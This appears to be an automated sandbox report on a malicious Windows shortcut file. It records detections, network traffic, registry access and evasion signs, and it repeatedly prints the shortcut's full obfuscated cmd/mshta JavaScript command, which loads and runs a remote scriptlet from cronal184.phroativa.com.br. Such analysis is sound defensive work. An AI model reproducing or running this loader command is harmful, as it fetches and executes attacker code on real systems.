Windows Analysis Report
V_273686.Lnk.lnk

Overview

General Information

Sample name:	V_273686.Lnk.lnk
Analysis ID:	1446726
MD5:	1dca9e98e575af3b1e2b90e59d75dc43
SHA1:	16cc510d884cae94137a9fbf90c4d2c0f0c5d2f1
SHA256:	a89872c21ac68096a76a60e5a13c77ddf79252c3097aea42865879c5b6d452f3
Tags:	lnk
Infos:

Detection

MalLnk

Score:	68
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Windows shortcut file (LNK) starts blacklisted processes

Yara detected malicious lnk

Machine Learning detection for sample

Creates a process in suspended mode (likely to inject code)

JA3 SSL client fingerprint seen in connection with other malware

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for the Microsoft Outlook file path

Uses a known web browser user agent for HTTP communication

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Signatures

AV Detection

Multi AV Scanner detection for submitted file

Source: V_273686.Lnk.lnk

ReversingLabs: Detection: 15%

Machine Learning detection for sample

Source: V_273686.Lnk.lnk

Joe Sandbox ML: detected

Source: unknown	HTTPS traffic detected: 172.67.217.192:443 -> 192.168.2.7:49700 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.15.59.224:443 -> 192.168.2.7:49701 version: TLS 1.2

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /?2/ HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: cronal184.phroativa.com.brConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: www.wikipedia.org

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /?2/ HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: cronal184.phroativa.com.brConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: www.wikipedia.org

Source: global traffic	DNS traffic detected: DNS query: cronal184.phroativa.com.br
Source: global traffic	DNS traffic detected: DNS query: www.wikipedia.org

Source: mshta.exe, 00000003.00000003.1233596963.00000290661AD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: HTtps://cronal184.phroativa.com.br/?2/
Source: mshta.exe, 00000003.00000002.1236137885.0000028863F3D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232784968.0000028863F3E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: HTtps://cronal184.phroativa.com.br/?2/(
Source: mshta.exe, 00000003.00000003.1232082384.0000029066201000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1230434017.00000290661DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232173549.0000029066210000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1231984723.0000029066201000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1231870463.0000029066201000.00000004.00000020.00020000.00000000.sdmp, EJF5C7CA.htm.3.dr	String found in binary or memory: https://creativecommons.org/licenses/by-sa/4.0/
Source: mshta.exe, 00000003.00000003.1232880364.0000028863F87000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1236239083.0000028863F8A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232642532.0000028863F83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cronal184.phroativa.com.br/
Source: mshta.exe, 00000003.00000002.1236199318.0000028863F5E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232784968.0000028863F3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1233829051.00000290661DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cronal184.phroativa.com.br/?2/
Source: mshta.exe, 00000003.00000002.1236630762.0000029066412000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cronal184.phroativa.com.br/?2/St
Source: mshta.exe, 00000003.00000003.1232642532.0000028863F5D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1236199318.0000028863F5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cronal184.phroativa.com.br/?2/U
Source: mshta.exe, 00000003.00000002.1236137885.0000028863F3D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232784968.0000028863F3E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cronal184.phroativa.com.br/?2/l
Source: mshta.exe, 00000003.00000003.1232082384.0000029066201000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1230434017.00000290661DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232173549.0000029066210000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1231984723.0000029066201000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1231870463.0000029066201000.00000004.00000020.00020000.00000000.sdmp, EJF5C7CA.htm.3.dr	String found in binary or memory: https://donate.wikimedia.org/?utm_medium=portal&utm_campaign=portalFooter&utm_source=portalFooter
Source: mshta.exe, 00000003.00000002.1235891376.0000028863EE5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://intake-logging.wikimedia.org/v1/events?stream=w3c.reportingapi.network_error&schema_uri=/w3c
Source: mshta.exe, 00000003.00000003.1232880364.0000028863F87000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232642532.0000028863F83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://intake-logging.wikimedia.org/v1/eventsx
Source: mshta.exe, 00000003.00000003.1232082384.0000029066201000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232173549.0000029066210000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1231984723.0000029066201000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1231870463.0000029066201000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://itunes.apple.com/app/apple-store/id324715238?pt=208305&c
Source: mshta.exe, 00000003.00000003.1230434017.00000290661DE000.00000004.00000020.00020000.00000000.sdmp, EJF5C7CA.htm.3.dr	String found in binary or memory: https://itunes.apple.com/app/apple-store/id324715238?pt=208305&ct=portal&mt=8
Source: mshta.exe, 00000003.00000003.1232948851.0000028863F93000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1236254485.0000028863F94000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232880364.0000028863F87000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232642532.0000028863F83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: mshta.exe, 00000003.00000003.1232082384.0000029066201000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1230434017.00000290661DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232173549.0000029066210000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1231984723.0000029066201000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1231870463.0000029066201000.00000004.00000020.00020000.00000000.sdmp, EJF5C7CA.htm.3.dr	String found in binary or memory: https://meta.wikimedia.org/wiki/Privacy_policy
Source: mshta.exe, 00000003.00000003.1232082384.0000029066201000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1230434017.00000290661DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232173549.0000029066210000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1231984723.0000029066201000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1231870463.0000029066201000.00000004.00000020.00020000.00000000.sdmp, EJF5C7CA.htm.3.dr	String found in binary or memory: https://meta.wikimedia.org/wiki/Special:MyLanguage/List_of_Wikipedias
Source: mshta.exe, 00000003.00000003.1232082384.0000029066201000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1230434017.00000290661DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232173549.0000029066210000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1231984723.0000029066201000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1231870463.0000029066201000.00000004.00000020.00020000.00000000.sdmp, EJF5C7CA.htm.3.dr	String found in binary or memory: https://meta.wikimedia.org/wiki/Terms_of_use
Source: mshta.exe, 00000003.00000003.1232082384.0000029066201000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232173549.0000029066210000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1231984723.0000029066201000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1231870463.0000029066201000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://play.google.com/store/apps/details?id=org.wikip
Source: mshta.exe, 00000003.00000003.1230434017.00000290661DE000.00000004.00000020.00020000.00000000.sdmp, EJF5C7CA.htm.3.dr	String found in binary or memory: https://play.google.com/store/apps/details?id=org.wikipedia&referrer=utm_source%3Dportal%26utm_mediu
Source: mshta.exe, 00000003.00000003.1230434017.00000290661DE000.00000004.00000020.00020000.00000000.sdmp, EJF5C7CA.htm.3.dr	String found in binary or memory: https://upload.wikimedia.org/wikipedia/en/thumb/8/80/Wikipedia-logo-v2.svg/2244px-Wikipedia-logo-v2.
Source: mshta.exe, 00000003.00000003.1230434017.00000290661DE000.00000004.00000020.00020000.00000000.sdmp, EJF5C7CA.htm.3.dr	String found in binary or memory: https://wikis.world/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701

Source: unknown	HTTPS traffic detected: 172.67.217.192:443 -> 192.168.2.7:49700 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.15.59.224:443 -> 192.168.2.7:49701 version: TLS 1.2

System Summary

Yara detected malicious lnk

Source: Yara match

File source: V_273686.Lnk.lnk, type: SAMPLE

Searches for the Microsoft Outlook file path

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Source: classification engine

Classification label: mal68.troj.winLNK@4/1@2/2

Source: C:\Windows\System32\mshta.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\EJF5C7CA.htm

Jump to behavior

Source: C:\Windows\System32\conhost.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: V_273686.Lnk.lnk

ReversingLabs: Detection: 15%

Source: unknown	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c MshtA "JaVAsCrIpT:var _$_NXUI=["\x4b\x49\x49\x54\x48\x5a\x4c","\163\x63\162\x69\160\x74\x3a\110\124\x74\x70\163\x3a\x2f\x2f\x63\x72\x6f\156\x61\x6c\x31\70\64\56\x70\x68\162\x6f\x61\x74\x69\166\x61\x2e\x63\157\155\x2e\142\x72\57\x3f\x32\x2f"];try{GetObject(_$_NXUI[1])[_$_NXUI[0]]()}catch(e){};close()"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe MshtA "JaVAsCrIpT:var _$_NXUI=["\x4b\x49\x49\x54\x48\x5a\x4c","\163\x63\162\x69\160\x74\x3a\110\124\x74\x70\163\x3a\x2f\x2f\x63\x72\x6f\156\x61\x6c\x31\70\64\56\x70\x68\162\x6f\x61\x74\x69\166\x61\x2e\x63\157\155\x2e\142\x72\57\x3f\x32\x2f"];try{GetObject(_$_NXUI[1])[_$_NXUI[0]]()}catch(e){};close()"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe MshtA "JaVAsCrIpT:var _$_NXUI=["\x4b\x49\x49\x54\x48\x5a\x4c","\163\x63\162\x69\160\x74\x3a\110\124\x74\x70\163\x3a\x2f\x2f\x63\x72\x6f\156\x61\x6c\x31\70\64\56\x70\x68\162\x6f\x61\x74\x69\166\x61\x2e\x63\157\155\x2e\142\x72\57\x3f\x32\x2f"];try{GetObject(_$_NXUI[1])[_$_NXUI[0]]()}catch(e){};close()"	Jump to behavior

Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mshtml.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msiso.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msimtf.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: jscript9.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d2d1.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dxcore.dll	Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32

Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings

Jump to behavior

Persistence and Installation Behavior

Windows shortcut file (LNK) starts blacklisted processes

Source: LNK file	Process created: C:\Windows\System32\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\mshta.exe
Source: LNK file	Process created: C:\Windows\System32\mshta.exe	Jump to behavior

Source: C:\Windows\System32\mshta.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: mshta.exe, 00000003.00000003.1232948851.0000028863FAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232642532.0000028863FAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1236254485.0000028863FAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232880364.0000028863FAE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: mshta.exe, 00000003.00000003.1232642532.0000028863F5D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1236199318.0000028863F5E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWi>pG
Source: mshta.exe, 00000003.00000003.1232642532.0000028863F5D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1236199318.0000028863F5E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWP}

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\mshta.exe MshtA "JaVAsCrIpT:var _$_NXUI=["\x4b\x49\x49\x54\x48\x5a\x4c","\163\x63\162\x69\160\x74\x3a\110\124\x74\x70\163\x3a\x2f\x2f\x63\x72\x6f\156\x61\x6c\x31\70\64\56\x70\x68\162\x6f\x61\x74\x69\166\x61\x2e\x63\157\155\x2e\142\x72\57\x3f\x32\x2f"];try{GetObject(_$_NXUI[1])[_$_NXUI[0]]()}catch(e){};close()"

Jump to behavior

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: unknown	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c mshta "javascript:var _$_nxui=["\x4b\x49\x49\x54\x48\x5a\x4c","\163\x63\162\x69\160\x74\x3a\110\124\x74\x70\163\x3a\x2f\x2f\x63\x72\x6f\156\x61\x6c\x31\70\64\56\x70\x68\162\x6f\x61\x74\x69\166\x61\x2e\x63\157\155\x2e\142\x72\57\x3f\x32\x2f"];try{getobject(_$_nxui[1])[_$_nxui[0]]()}catch(e){};close()"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta "javascript:var _$_nxui=["\x4b\x49\x49\x54\x48\x5a\x4c","\163\x63\162\x69\160\x74\x3a\110\124\x74\x70\163\x3a\x2f\x2f\x63\x72\x6f\156\x61\x6c\x31\70\64\56\x70\x68\162\x6f\x61\x74\x69\166\x61\x2e\x63\157\155\x2e\142\x72\57\x3f\x32\x2f"];try{getobject(_$_nxui[1])[_$_nxui[0]]()}catch(e){};close()"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta "javascript:var _$_nxui=["\x4b\x49\x49\x54\x48\x5a\x4c","\163\x63\162\x69\160\x74\x3a\110\124\x74\x70\163\x3a\x2f\x2f\x63\x72\x6f\156\x61\x6c\x31\70\64\56\x70\x68\162\x6f\x61\x74\x69\166\x61\x2e\x63\157\155\x2e\142\x72\57\x3f\x32\x2f"];try{getobject(_$_nxui[1])[_$_nxui[0]]()}catch(e){};close()"	Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\mshta.exe

Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation

Jump to behavior

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
172.67.217.192	cronal184.phroativa.com.br	United States		13335	CLOUDFLARENETUS	false
185.15.59.224	dyna.wikimedia.org	Netherlands		14907	WIKIMEDIAUS	false

Contacted Domains

Name	IP	Active
dyna.wikimedia.org	185.15.59.224	true
cronal184.phroativa.com.br	172.67.217.192	true
www.wikipedia.org	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://www.wikipedia.org/	false	Avira URL Cloud: safe	unknown
https://cronal184.phroativa.com.br/?2/	false		unknown

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\EJF5C7CA.htm	HTML document, Unicode text, UTF-8 text, with very long lines (27738)	077E36EB6628FCE80C3449B6ED207B8E	559EE0AAC8ADC15BB17FB1DED93250D1548B3DC8	44BB26DCC0205A3C9329A3A05A63FEC50F20D9DC2F41E047255A5B2A6DAE4A13

AV Detection

Multi AV Scanner detection for submitted file

Source: V_273686.Lnk.lnk

ReversingLabs: Detection: 15%

Machine Learning detection for sample

Source: V_273686.Lnk.lnk

Joe Sandbox ML: detected

Source: unknown	HTTPS traffic detected: 172.67.217.192:443 -> 192.168.2.7:49700 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.15.59.224:443 -> 192.168.2.7:49701 version: TLS 1.2

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /?2/ HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: cronal184.phroativa.com.brConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: www.wikipedia.org

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /?2/ HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: cronal184.phroativa.com.brConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: www.wikipedia.org

Source: global traffic	DNS traffic detected: DNS query: cronal184.phroativa.com.br
Source: global traffic	DNS traffic detected: DNS query: www.wikipedia.org

Source: mshta.exe, 00000003.00000003.1233596963.00000290661AD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: HTtps://cronal184.phroativa.com.br/?2/
Source: mshta.exe, 00000003.00000002.1236137885.0000028863F3D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232784968.0000028863F3E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: HTtps://cronal184.phroativa.com.br/?2/(
Source: mshta.exe, 00000003.00000003.1232082384.0000029066201000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1230434017.00000290661DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232173549.0000029066210000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1231984723.0000029066201000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1231870463.0000029066201000.00000004.00000020.00020000.00000000.sdmp, EJF5C7CA.htm.3.dr	String found in binary or memory: https://creativecommons.org/licenses/by-sa/4.0/
Source: mshta.exe, 00000003.00000003.1232880364.0000028863F87000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1236239083.0000028863F8A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232642532.0000028863F83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cronal184.phroativa.com.br/
Source: mshta.exe, 00000003.00000002.1236199318.0000028863F5E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232784968.0000028863F3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1233829051.00000290661DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cronal184.phroativa.com.br/?2/
Source: mshta.exe, 00000003.00000002.1236630762.0000029066412000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cronal184.phroativa.com.br/?2/St
Source: mshta.exe, 00000003.00000003.1232642532.0000028863F5D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1236199318.0000028863F5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cronal184.phroativa.com.br/?2/U
Source: mshta.exe, 00000003.00000002.1236137885.0000028863F3D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232784968.0000028863F3E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cronal184.phroativa.com.br/?2/l
